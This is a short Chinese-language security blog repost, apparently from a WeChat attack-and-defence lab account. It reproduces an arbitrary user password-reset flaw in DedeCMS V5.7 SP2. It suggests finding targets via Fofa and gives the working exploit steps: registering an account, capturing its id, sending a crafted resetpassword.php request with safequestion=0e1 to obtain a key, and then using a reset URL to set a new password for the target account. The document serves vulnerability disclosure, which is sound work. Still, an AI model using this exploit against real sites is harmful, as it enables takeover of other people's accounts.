DedeCMS任意用户密码重置漏洞

admin 2023年11月8日00:15:07评论49 views字数 367阅读1分13秒阅读模式

漏洞环境

Fofadedecms

漏洞危害

重置系统的所有账号的密码

影响范围

DeDecms V5.7 SP2最新版本

漏洞复现

首先注册账号0000001/0000002

DedeCMS任意用户密码重置漏洞

登录成功

DedeCMS任意用户密码重置漏洞

通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器,再次访问登录页面

DedeCMS任意用户密码重置漏洞

构造请求包生成poc

/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=16

DedeCMS任意用户密码重置漏洞

根据poc构造重置密码的url

http://www.xxx.com/member/resetpassword.php?dopost=getpasswd&id=16&key=b8sJ1HN6

DedeCMS任意用户密码重置漏洞

直接在这对目标账号修改个新密码就行了。

原文始发于微信公众号(赛瑞攻防实验室):DedeCMS任意用户密码重置漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月8日00:15:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DedeCMS任意用户密码重置漏洞https://cn-sec.com/archives/887304.html

发表评论

匿名网友 填写信息